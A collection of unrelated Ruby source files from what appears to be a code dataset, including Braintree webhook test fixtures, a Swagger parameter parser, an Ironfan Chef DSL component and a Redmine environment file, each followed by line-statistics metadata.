result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Monitor::Mgmt::V2017_05_01_preview::Models::DiagnosticSettingsCategoryResourceCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 41.430622 | 141 | 0.694653 |
03484ce767b72023c560ca1eee003c243c7387bb | 310 | json.id @review.id
# Nested "body" object: the review's user-visible attributes, extracted
# straight from the model (same keys, same order as before).
json.body do
  json.extract! @review, :title, :description, :score, :reviewer_id
end
# Nested "dates" object: record timestamps plus a canonical JSON URL.
json.dates do
  json.extract! @review, :created_at, :updated_at
  json.url review_url(@review, format: :json)
end
| 20.666667 | 45 | 0.767742 |
181fd4382ed987f7b1c033bd35a778cc50b1273a | 21,218 | module Braintree
class WebhookTestingGateway # :nodoc:
def initialize(gateway)
@gateway = gateway
@config = gateway.config
@config.assert_has_access_token_or_keys
end
def sample_notification(kind, id)
payload = Base64.encode64(_sample_xml(kind, id))
signature_string = "#{@config.public_key}|#{Braintree::Digest.hexdigest(@config.private_key, payload)}"
return {:bt_signature => signature_string, :bt_payload => payload}
end
def _sample_xml(kind, data)
<<-XML
<notification>
<timestamp type="datetime">#{Time.now.utc.iso8601}</timestamp>
<kind>#{kind}</kind>
<subject>
#{_subject_sample_xml(kind, data)}
</subject>
</notification>
XML
end
def _subject_sample_xml(kind, id)
case kind
when Braintree::WebhookNotification::Kind::Check
_check
when Braintree::WebhookNotification::Kind::DisputeOpened
_dispute_opened_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisputeLost
_dispute_lost_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisputeWon
_dispute_won_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantConnected
_partner_merchant_connected_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantDisconnected
_partner_merchant_disconnected_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantDeclined
_partner_merchant_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubMerchantAccountApproved
_merchant_account_approved_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubMerchantAccountDeclined
_merchant_account_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionDisbursed
_transaction_disbursed_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionSettled
_transaction_settled_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionSettlementDeclined
_transaction_settlement_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisbursementException
_disbursement_exception_sample_xml(id)
when Braintree::WebhookNotification::Kind::Disbursement
_disbursement_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubscriptionChargedSuccessfully
_subscription_charged_successfully(id)
when Braintree::WebhookNotification::Kind::AccountUpdaterDailyReport
_account_updater_daily_report_sample_xml(id)
when Braintree::WebhookNotification::Kind::ConnectedMerchantStatusTransitioned
_auth_status_transitioned_sample_xml(id)
when Braintree::WebhookNotification::Kind::ConnectedMerchantPayPalStatusChanged
_auth_paypal_status_changed_sample_xml(id)
when Braintree::WebhookNotification::Kind::IdealPaymentComplete
_ideal_payment_complete_sample_xml(id)
when Braintree::WebhookNotification::Kind::IdealPaymentFailed
_ideal_payment_failed_sample_xml(id)
else
_subscription_sample_xml(id)
end
end
def _check
<<-XML
<check type="boolean">true</check>
XML
end
def _subscription_charged_successfully(id)
<<-XML
<subscription>
<id>#{id}</id>
<transactions type="array">
<transaction>
<status>submitted_for_settlement</status>
<amount>49.99</amount>
</transaction>
</transactions>
<add_ons type="array">
</add_ons>
<discounts type="array">
</discounts>
</subscription>
XML
end
def _subscription_sample_xml(id)
<<-XML
<subscription>
<id>#{id}</id>
<transactions type="array">
</transactions>
<add_ons type="array">
</add_ons>
<discounts type="array">
</discounts>
</subscription>
XML
end
def _partner_merchant_connected_sample_xml(data)
<<-XML
<partner-merchant>
<merchant-public-id>public_id</merchant-public-id>
<public-key>public_key</public-key>
<private-key>private_key</private-key>
<partner-merchant-id>abc123</partner-merchant-id>
<client-side-encryption-key>cse_key</client-side-encryption-key>
</partner-merchant>
XML
end
def _partner_merchant_disconnected_sample_xml(data)
<<-XML
<partner-merchant>
<partner-merchant-id>abc123</partner-merchant-id>
</partner-merchant>
XML
end
def _partner_merchant_declined_sample_xml(data)
<<-XML
<partner-merchant>
<partner-merchant-id>abc123</partner-merchant-id>
</partner-merchant>
XML
end
def _merchant_account_approved_sample_xml(id)
<<-XML
<merchant_account>
<id>#{id}</id>
<master_merchant_account>
<id>master_ma_for_#{id}</id>
<status>active</status>
</master_merchant_account>
<status>active</status>
</merchant_account>
XML
end
def _merchant_account_declined_sample_xml(id)
<<-XML
<api-error-response>
<message>Credit score is too low</message>
<errors>
<errors type="array"/>
<merchant-account>
<errors type="array">
<error>
<code>82621</code>
<message>Credit score is too low</message>
<attribute type="symbol">base</attribute>
</error>
</errors>
</merchant-account>
</errors>
<merchant-account>
<id>#{id}</id>
<status>suspended</status>
<master-merchant-account>
<id>master_ma_for_#{id}</id>
<status>suspended</status>
</master-merchant-account>
</merchant-account>
</api-error-response>
XML
end
def _transaction_disbursed_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<amount>100</amount>
<disbursement-details>
<disbursement-date type="date">2013-07-09</disbursement-date>
</disbursement-details>
</transaction>
XML
end
def _transaction_settled_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<status>settled</status>
<type>sale</type>
<currency-iso-code>USD</currency-iso-code>
<amount>100.00</amount>
<merchant-account-id>ogaotkivejpfayqfeaimuktty</merchant-account-id>
<payment-instrument-type>us_bank_account</payment-instrument-type>
<us-bank-account>
<routing-number>123456789</routing-number>
<last-4>1234</last-4>
<account-type>checking</account-type>
<account-holder-name>Dan Schulman</account-holder-name>
</us-bank-account>
</transaction>
XML
end
def _transaction_settlement_declined_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<status>settlement_declined</status>
<type>sale</type>
<currency-iso-code>USD</currency-iso-code>
<amount>100.00</amount>
<merchant-account-id>ogaotkivejpfayqfeaimuktty</merchant-account-id>
<payment-instrument-type>us_bank_account</payment-instrument-type>
<us-bank-account>
<routing-number>123456789</routing-number>
<last-4>1234</last-4>
<account-type>checking</account-type>
<account-holder-name>Dan Schulman</account-holder-name>
</us-bank-account>
</transaction>
XML
end
def _dispute_opened_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_opened_sample_xml(id)
else
_new_dispute_opened_sample_xml(id)
end
end
def _dispute_lost_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_lost_sample_xml(id)
else
_new_dispute_lost_sample_xml(id)
end
end
def _dispute_won_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_won_sample_xml(id)
else
_new_dispute_won_sample_xml(id)
end
end
def _old_dispute_opened_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>open</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _old_dispute_lost_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>lost</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _old_dispute_won_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>won</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
<date-won type=\"date\">2014-03-22</date-won>
</dispute>
XML
end
def _new_dispute_opened_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>open</status>
<updated-at type="datetime">2017-06-16T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
</status-history>
<evidence type="array"/>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _new_dispute_lost_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>lost</status>
<updated-at type="datetime">2017-06-21T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
<status-history>
<status>lost</status>
<timestamp type="datetime">2017-06-25T20:50:55Z</timestamp>
</status-history>
</status-history>
<evidence type="array">
<evidence>
<id>rxtngk9j5j93tsrq</id>
<comments nil="true"/>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url>s3.amazonaws.com/foo.jpg</url>
</evidence>
<evidence>
<id>88cfb8dd</id>
<comments>text evidence</comments>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url nil="true"/>
</evidence>
</evidence>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _new_dispute_won_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>won</status>
<updated-at type="datetime">2017-06-21T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
<status-history>
<status>won</status>
<timestamp type="datetime">2017-06-25T20:50:55Z</timestamp>
</status-history>
</status-history>
<evidence type="array">
<evidence>
<id>rxtngk9j5j93tsrq</id>
<comments nil="true"/>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url>s3.amazonaws.com/foo.jpg</url>
</evidence>
<evidence>
<id>88cfb8dd</id>
<comments>text evidence</comments>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url nil="true"/>
</evidence>
</evidence>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
<date-won type=\"date\">2014-03-22</date-won>
</dispute>
XML
end
def _disbursement_exception_sample_xml(id)
<<-XML
<disbursement>
<id>#{id}</id>
<transaction-ids type="array">
<item>afv56j</item>
<item>kj8hjk</item>
</transaction-ids>
<success type="boolean">false</success>
<retry type="boolean">false</retry>
<merchant-account>
<id>merchant_account_token</id>
<currency-iso-code>USD</currency-iso-code>
<sub-merchant-account type="boolean">false</sub-merchant-account>
<status>active</status>
</merchant-account>
<amount>100.00</amount>
<disbursement-date type="date">2014-02-10</disbursement-date>
<exception-message>bank_rejected</exception-message>
<follow-up-action>update_funding_information</follow-up-action>
</disbursement>
XML
end
def _disbursement_sample_xml(id)
<<-XML
<disbursement>
<id>#{id}</id>
<transaction-ids type="array">
<item>afv56j</item>
<item>kj8hjk</item>
</transaction-ids>
<success type="boolean">true</success>
<retry type="boolean">false</retry>
<merchant-account>
<id>merchant_account_token</id>
<currency-iso-code>USD</currency-iso-code>
<sub-merchant-account type="boolean">false</sub-merchant-account>
<status>active</status>
</merchant-account>
<amount>100.00</amount>
<disbursement-date type="date">2014-02-10</disbursement-date>
<exception-message nil="true"/>
<follow-up-action nil="true"/>
</disbursement>
XML
end
def _account_updater_daily_report_sample_xml(id)
<<-XML
<account-updater-daily-report>
<report-date type="date">2016-01-14</report-date>
<report-url>link-to-csv-report</report-url>
</account-updater-daily-report>
XML
end
def _auth_status_transitioned_sample_xml(id)
<<-XML
<connected-merchant-status-transitioned>
<merchant-public-id>#{id}</merchant-public-id>
<status>new_status</status>
<oauth-application-client-id>oauth_application_client_id</oauth-application-client-id>
</connected-merchant-status-transitioned>
XML
end
def _auth_paypal_status_changed_sample_xml(id)
<<-XML
<connected-merchant-paypal-status-changed>
<oauth-application-client-id>oauth_application_client_id</oauth-application-client-id>
<merchant-public-id>#{id}</merchant-public-id>
<action>link</action>
</connected-merchant-paypal-status-changed>
XML
end
def _ideal_payment_complete_sample_xml(id)
<<-XML
<ideal-payment>
<id>#{id}</id>
<status>COMPLETE</status>
<issuer>ABCISSUER</issuer>
<order-id>ORDERABC</order-id>
<currency>EUR</currency>
<amount>10.00</amount>
<created-at>2016-11-29T23:27:34.547Z</created-at>
<approval-url>https://example.com</approval-url>
<ideal-transaction-id>1234567890</ideal-transaction-id>
</ideal-payment>
XML
end
def _ideal_payment_failed_sample_xml(id)
<<-XML
<ideal-payment>
<id>#{id}</id>
<status>FAILED</status>
<issuer>ABCISSUER</issuer>
<order-id>ORDERABC</order-id>
<currency>EUR</currency>
<amount>10.00</amount>
<created-at>2016-11-29T23:27:34.547Z</created-at>
<approval-url>https://example.com</approval-url>
<ideal-transaction-id>1234567890</ideal-transaction-id>
</ideal-payment>
XML
end
end
end
| 34.898026 | 109 | 0.579838 |
1d9a39669ab63f3d93a8b8920d02201ffc94421d | 592 | # Load the rails application
require File.expand_path('../application', __FILE__)

# Refuse to boot while legacy plugins remain under vendor/plugins.
vendor_plugins_dir = File.join(Rails.root, "vendor", "plugins")
unless Dir.glob(File.join(vendor_plugins_dir, "*")).empty?
  # abort prints its message to $stderr and exits with status 1 — the same
  # observable behavior as the previous $stderr.puts + exit 1 pair.
  abort "Plugins in vendor/plugins (#{vendor_plugins_dir}) are no longer allowed. " \
        "Please, put your Redmine plugins in the `plugins` directory at the root of your " \
        "Redmine directory (#{File.join(Rails.root, "plugins")})"
end

# Boot the Rails application.
RedmineApp::Application.initialize!
| 39.466667 | 92 | 0.741554 |
6acd7beac88c3f5419e3b83ff324a588120f027f | 201 | def tau(n)
return 1 if n == 1
2 * (1..Math.sqrt(n)).count { |i| n % i == 0 }
end
# Walk triangular numbers T(k) = T(k-1) + k until one has over 500 divisors.
n, i = 3, 3
while tau(n) < 500
  n, i = n + i, i + 1
end
result = n
puts result
# Fix: `raise Error` referenced an undefined constant and would have raised
# NameError instead of a meaningful failure; use a descriptive message.
raise "expected 76576500, got #{result}" unless result == 76576500
| 14.357143 | 48 | 0.562189 |
383e98f58949028dfd16b5f87137beb6d5019590 | 938 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
  module Apis
    module LanguageV1beta2
      # Version of the google-apis-language_v1beta2 gem
      GEM_VERSION = "0.4.0"

      # Version of the code generator used to generate this client
      GENERATOR_VERSION = "0.2.0"

      # Revision of the discovery document this client was generated from
      # (a YYYYMMDD snapshot date of the upstream Discovery document)
      REVISION = "20210319"
    end
  end
end
| 32.344828 | 74 | 0.731343 |
5d37ddb111b1e1b733b23d8617b40dc2527986c8 | 552 | module Navigation
class NavbarComponent < ViewComponent::Base
private
def resources
helpers.navigation_resources
end
def nav_link(link_text, link_path)
class_name = "active" if first_uri_segment_matches_link?(link_path)
tag.li class: class_name do
link_to_unless_current link_text, link_path
end
end
def first_uri_segment_matches_link?(link_path)
current_uri = request.path
if (matches = /^\/[^\/]*/.match(current_uri))
matches[0] == link_path
end
end
end
end
| 22.08 | 73 | 0.677536 |
87caa420f570b07faa3d114591670d2e2bb9a236 | 3,248 | # frozen_string_literal: true
#
# Cookbook Name:: aws-parallelcluster
# Recipe:: prep_env
#
# Copyright 2013-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
# License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
# Validate OS type specified by the user is the same as the OS identified by Ohai
validate_os_type

# Validate init system
raise "Init package #{node['init_package']} not supported." unless node['init_package'] == 'systemd'

# Determine scheduler_slots settings and update instance_slots appropriately
# 'vcpus'/'cores' map to the counts Ohai detected on this node; any other
# value is taken verbatim as an explicit slot count.
node.default['cluster']['instance_slots'] = case node['cluster']['scheduler_slots']
                                            when 'vcpus'
                                              node['cpu']['total']
                                            when 'cores'
                                              node['cpu']['cores']
                                            else
                                              node['cluster']['scheduler_slots']
                                            end
# NOTE: this recipe must be included after instance_slot because it may alter the values of
# node['cpu']['total'], which would break the expected behavior when setting scheduler_slots
# to one of the constants looked for in the above conditionals
include_recipe "aws-parallelcluster-config::disable_hyperthreading"

# Setup directories
directory '/etc/parallelcluster'
directory '/opt/parallelcluster'
directory '/opt/parallelcluster/scripts'
directory node['cluster']['base_dir']
directory node['cluster']['sources_dir']
directory node['cluster']['scripts_dir']
directory node['cluster']['license_dir']
directory node['cluster']['configs_dir']

# Create ParallelCluster log folder
# mode 1777 (sticky + world-writable) lets every service write its own logs
# while preventing users from removing each other's files.
directory '/var/log/parallelcluster/' do
  owner 'root'
  mode '1777'
  recursive true
end

# Render the cfnconfig environment file and keep the historical
# /opt/parallelcluster/cfnconfig path working via a symlink.
template '/etc/parallelcluster/cfnconfig' do
  source 'prep_env/cfnconfig.erb'
  mode '0644'
end

link '/opt/parallelcluster/cfnconfig' do
  to '/etc/parallelcluster/cfnconfig'
end

template "/opt/parallelcluster/scripts/fetch_and_run" do
  source 'prep_env/fetch_and_run.erb'
  owner "root"
  group "root"
  mode "0755"
end
# Install cloudwatch, write configuration and start it.
include_recipe "aws-parallelcluster-config::cloudwatch_agent"

# Configure additional Networking Interfaces (if present)
include_recipe "aws-parallelcluster-config::network_interfaces" unless virtualized?

include_recipe "aws-parallelcluster-config::mount_home" if node['cluster']['node_type'] == "ComputeFleet"
# Fetch the cluster config for every scheduler except AWS Batch.
# Fix: the guard previously compared against 'awsbastch' (typo), which can
# never match, so fetch_config also ran for Batch clusters.
include_recipe "aws-parallelcluster-config::fetch_config" unless node['cluster']['scheduler'] == 'awsbatch'
include_recipe "aws-parallelcluster-slurm::prep_env" if node['cluster']['scheduler'] == 'slurm'
include_recipe "aws-parallelcluster-byos::prep_env" if node['cluster']['scheduler'] == 'byos'
| 38.666667 | 121 | 0.693658 |
# Backport of Symbol#empty? for Rubies that do not ship it natively.
# A symbol is considered empty when its string representation is "".
unless Symbol.method_defined?(:empty?)
  class Symbol
    def empty?
      to_s.empty?
    end
  end
end
| 13 | 37 | 0.653846 |
623d6391e93ccaeaa938e420832f8e87105945af | 3,473 | require 'vintage/swagger/object'
require 'vintage/swagger/objects/items'
require 'vintage/swagger/objects/schema'
require 'vintage/grape/param'
module Vintage
  module Swagger
    module Objects
      # Swagger 2.0 Parameter Object.
      # https://github.com/swagger-api/swagger-spec/blob/master/versions/2.0.md#parameter-object
      class Parameter < Vintage::Swagger::Object
        swagger_attr :name, :in, :description, :required, :schema,
                     :type, :format, :allowEmptyValue, :items,
                     :collectionFormat, :default, :maximum,
                     :exclusiveMaximum, :minimum, :exclusiveMinimum,
                     :maxLength, :minLength, :pattern, :maxItems,
                     :minItems, :uniqueItems, :enum, :multipleOf

        # Builds a Parameter from a raw Swagger hash; returns nil for nil input.
        # Body parameters carry a schema object; parameters in any other
        # location carry the type/format attribute family plus optional items.
        def self.parse(new_parameter)
          return nil unless new_parameter
          p = Vintage::Swagger::Objects::Parameter.new
          %w(name in description required).each do |field|
            p.send("#{field}=", new_parameter[field])
          end
          if p.in == 'body'
            # BUGFIX: was `Vintage::Swagger::Objects::chema` (missing capital S),
            # which raised NameError whenever a body parameter was parsed.
            p.schema = Vintage::Swagger::Objects::Schema.parse(new_parameter['schema'])
          else
            %w(type format allowEmptyValue collectionFormat default maximum exclusiveMaximum minimum exclusiveMinimum maxLength minLength pattern maxItems minItems uniqueItems enum multipleOf).each do |field|
              p.send("#{field}=", new_parameter[field])
            end
            p.items = Vintage::Swagger::Objects::Items.parse(new_parameter['items'])
          end
          p
        end

        # name is mandatory for every parameter.
        def name=(new_name)
          raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#name called with nil') if new_name.nil?
          @name = new_name
        end

        # `in` is restricted to the five locations allowed by the 2.0 spec.
        def in=(new_in)
          raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#in= called with nil') if new_in.nil?
          raise ArgumentError.new("Vintage::Swagger::Objects::Parameter#in= called with invalid value #{new_in}") unless %w(query header path formData body).include?(new_in)
          @in = new_in
        end

        # items is mandatory when type == 'array'; raw hashes are coerced into
        # Items objects.
        def items=(new_items)
          raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#items= items is nil') if new_items.nil? && @type == 'array'
          if !new_items.nil? && !new_items.is_a?(Vintage::Swagger::Objects::Items)
            new_items = Vintage::Swagger::Objects::Items.parse(new_items)
          end
          @items = new_items
        end

        # Maps a Grape parameter definition ([name, options]) onto a formData
        # Parameter. Returns nil for Hash-typed parameters or when no Swagger
        # type can be derived; re-raises (after logging) any parse error.
        def self.from_grape(grape_parameter)
          return nil if grape_parameter.nil? || grape_parameter.last[:type].is_a?(Hash) || grape_parameter.last[:type] == 'Hash'
          grape_type = Vintage::Grape::Param.new(grape_parameter.last).to_swagger
          parameter = Vintage::Swagger::Objects::Parameter.new
          parameter.name = grape_parameter.first
          parameter.in = 'formData'
          parameter.description = grape_type['description']
          parameter.required = grape_type['required']
          parameter.default = grape_type['default']
          parameter.type = grape_type['type']
          parameter.format = grape_type['format']
          if parameter.type == 'array'
            # Grape does not tell us the element type; default to string items.
            items = Vintage::Swagger::Objects::Items.new
            items.type = 'string'
            parameter.items = items
          end
          parameter.type.nil? ? nil : parameter
        rescue => e
          puts "error processing parameter #{grape_parameter} [#{e}]"
          raise e
        end
      end
    end
  end
end
| 39.91954 | 208 | 0.621077 |
39f4e3bbf7ec75c2d27e098c8e92a0baba52c40b | 4,921 | module Ironfan
class Dsl
class Component < Ironfan::Dsl
include Gorillib::Builder
include Gorillib::Concern
include Ironfan::Plugin::Base; register_with Ironfan::Dsl::Compute
field :cluster_name, Symbol
field :facet_name, Symbol
field :realm_name, Symbol
field :name, Symbol
def initialize(attrs, &blk)
attrs.merge!(facet_name: (attrs[:owner].name unless attrs[:owner].nil? or not attrs[:owner].is_a?(Facet)),
cluster_name: (attrs[:owner].cluster_name unless attrs[:owner].nil?),
realm_name: (attrs[:owner].realm_name unless attrs[:owner].nil?))
super attrs, &blk
end
def self.plugin_hook owner, attrs, plugin_name, full_name, &blk
(this = new(attrs.merge(owner: owner, name: full_name), &blk))._project(owner)
this
end
def announce_to node
node.set['components']["#{cluster_name}-#{name}"]['name'] = name
end
def self.to_node
super.tap do |node|
node.set['cluster_name'] = cluster_name
end
end
def self.from_node(node = NilCheckDelegate.new(nil))
cluster_name = node['cluster_name'].to_s
super(node).tap{|x| x.receive!(cluster_name: cluster_name,
realm_name: cluster_name.split('_').first)}
end
def self.announce_name
plugin_name
end
def announce_name
self.class.announce_name
end
def _project(compute)
compute.component name, self
project(compute)
end
def realm_announcements
(@@realm_announcements ||= {})
end
def realm_subscriptions component_name
(@@realm_subscriptions ||= {})[component_name] ||= []
end
def announce(component_name)
Chef::Log.debug("announced #{announce_name} for #{cluster_name}")
realm_announcements[[realm_name, component_name]] = [cluster_name, facet_name]
realm_subscriptions(component_name).each{|blk| blk.call(cluster_name, facet_name)}
end
def discover(component_name, &blk)
if already_announced = realm_announcements[[realm_name, component_name]]
yield *already_announced
else
Chef::Log.debug("#{cluster_name}: no one announced #{announce_name}. subscribing")
realm_subscriptions(component_name) << blk
end
end
end
module Discovery
include Gorillib::Builder
extend Gorillib::Concern
magic :server_cluster, Symbol
magic :bidirectional, :boolean, default: false
(@_dependencies ||= []) << Gorillib::Builder
module ClassMethods
def default_to_bidirectional default=true
magic :bidirectional, :boolean, default: default
end
end
def set_discovery compute, keys
if server_cluster
wire_to(compute, full_server_cluster, keys)
else
# I'm defanging automatic discovery for now.
raise StandardError.new("must explicitly specify a server_cluster for discovery")
# discover(announce_name) do |cluster_name, facet_name|
# wire_to(compute, [cluster_name, facet_name].join('-'), keys)
# end
end
end
def wire_to(compute, full_server_cluster_v, keys)
discovery = {discovers: keys.reverse.inject(full_server_cluster_v){|hsh,key| {key => hsh}}}
(compute.facet_role || compute.cluster_role).override_attributes(discovery)
# FIXME: This is Ec2-specific and probably doesn't belong here.
client_group_v = client_group(compute)
server_group_v = security_group(full_server_cluster_v)
group_edge(compute.cloud(:ec2), client_group_v, :authorized_by_group, server_group_v)
group_edge(compute.cloud(:ec2), client_group_v, :authorize_group, server_group_v) if bidirectional
Chef::Log.debug("discovered #{announce_name} for #{cluster_name}: #{discovery}")
end
protected
def client_group(compute)
security_group(compute.cluster_name, (compute.name if compute.is_a?(Facet)))
end
def full_server_cluster
"#{realm_name}_#{server_cluster}"
end
def group_edge(cloud, group_1, method, group_2)
cloud.security_group(group_1).send(method, group_2)
Chef::Log.debug("component.rb: allowing access from security group #{group_1} to #{group_2}")
end
def security_group(*target_components)
target_components.compact.join('-')
end
end
module Announcement
include Gorillib::Builder
def _project(compute)
announce announce_name
super compute
end
end
def to_manifest
to_wire.reject{|k,_| _skip_fields.include? k}
end
def _skip_fields() skip_fields << :_type; end
def skip_fields() [] end
end
end
| 31.544872 | 114 | 0.640114 |
1cd78764835b91cc9b691e8cb27c3d37aaa65d6c | 110 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'page_by_page'
require 'minitest/autorun'
| 22 | 58 | 0.754545 |
e9f224583a2a0936f32045bc403529e245a8ce42 | 1,631 | #
# Be sure to run `pod lib lint CenfoWebAPICaller.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
  s.name             = 'CenfoWebAPICaller'
  s.version          = '0.1.0'
  # NOTE(review): summary and description below are still the CocoaPods
  # template placeholders — fill them in before publishing the pod.
  s.summary          = 'A short description of CenfoWebAPICaller.'

# This description is used to generate tags and improve search results.
#   * Think: What does it do? Why did you write it? What is the focus?
#   * Try to keep it short, snappy and to the point.
#   * Write the description between the DESC delimiters below.
#   * Finally, don't worry about the indent, CocoaPods strips it!

  s.description      = <<-DESC
TODO: Add long description of the pod here.
                       DESC

